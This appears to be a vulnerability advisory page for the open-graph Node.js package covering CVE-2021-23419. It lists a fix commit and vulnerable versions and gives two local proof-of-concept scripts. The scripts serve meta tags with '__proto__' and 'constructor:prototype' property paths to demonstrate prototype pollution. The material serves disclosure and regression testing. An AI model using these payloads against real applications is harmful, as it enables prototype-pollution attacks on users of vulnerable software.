An Open Graph implementation for Node.js.
Latest version: 0.2.6
CVE | Fix |
---|---|
CVE-2021-23419 | https://github.com/samholmes/node-open-graph/commit/a0cef507a90adaac7dbbe9c404f09a50bdefb348 |
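// Local regression check for CVE-2021-23419 (prototype pollution in open-graph).
//
// A throwaway fixture server returns a single <meta> tag whose Open Graph
// property path contains the `__proto__` segment. The installed open-graph is
// then pointed at that fixture. If the parser walks the path without rejecting
// that segment, the value lands on Object.prototype and shows up on every
// plain object in the process, which is what the `({}).a` probe detects.
//
// Defensive takeaway: a parser that builds nested objects from attacker-chosen
// key paths has to reject `__proto__`, `constructor` and `prototype` segments
// (or build on a null-prototype object). Compare the installed version against
// the vulnerable-versions list and the fix commit referenced on this page.
const http = require('http');

http
  .createServer((req, res) => {
    res.write('<meta property="og:__proto__:a" content="b" />');
    res.end();
  })
  // unref() so the fixture server alone never keeps the process alive.
  .unref()
  // Bind to loopback only: the fixture has no reason to be reachable from the
  // network, and the client below connects to 127.0.0.1 anyway.
  .listen(7867, '127.0.0.1');

const og = require('open-graph');

og('http://127.0.0.1:7867', (err) => {
  // Probe first: pollution may already have happened even if the library
  // reports an error afterwards.
  const polluted = ({}).a === 'b';

  if (polluted) {
    // Undo the side effect so the rest of the process (e.g. a test runner
    // hosting this check) does not keep running with a tainted prototype.
    delete Object.prototype.a;
    console.log('exploitable');
    return;
  }

  // A failed fetch or parse must not be mistaken for a clean result.
  if (err) {
    console.error('inconclusive: open-graph reported an error:', err);
    return;
  }

  console.log('not exploitable with this input');
});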
Vulnerable versions: 0.1.5, 0.1.6, 0.1.7, 0.2.0, 0.2.1, 0.2.2, 0.2.3, 0.2.4
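// Local regression check for the `constructor:prototype` variant of the
// prototype-pollution issue in open-graph.
//
// A throwaway fixture server returns a single <meta> tag whose Open Graph
// property path goes through `constructor` and then `prototype`. On a plain
// object that path resolves to Object.prototype, so a parser that filters only
// `__proto__` is still affected. The `({}).a` probe detects whether the value
// became visible on unrelated plain objects.
//
// Defensive takeaway: key-path filtering has to cover `constructor` and
// `prototype` as well as `__proto__`, or the result object should be created
// without a prototype. Compare the installed version against the
// vulnerable-versions list on this page.
const http = require('http');

http
  .createServer((req, res) => {
    res.write('<meta property="og:constructor:prototype:a" content="b" />');
    res.end();
  })
  // unref() so the fixture server alone never keeps the process alive.
  .unref()
  // Bind to loopback only: the fixture has no reason to be reachable from the
  // network, and the client below connects to 127.0.0.1 anyway.
  .listen(7867, '127.0.0.1');

const og = require('open-graph');

og('http://127.0.0.1:7867', (err) => {
  // Probe first: pollution may already have happened even if the library
  // reports an error afterwards.
  const polluted = ({}).a === 'b';

  if (polluted) {
    // Undo the side effect so the hosting process does not keep running with
    // a tainted Object.prototype.
    delete Object.prototype.a;
    console.log('exploitable');
    return;
  }

  // A failed fetch or parse must not be mistaken for a clean result.
  if (err) {
    console.error('inconclusive: open-graph reported an error:', err);
    return;
  }

  console.log('not exploitable with this input');
});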
Vulnerable versions: 0.1.5, 0.1.6, 0.1.7, 0.2.0, 0.2.1, 0.2.2, 0.2.3, 0.2.4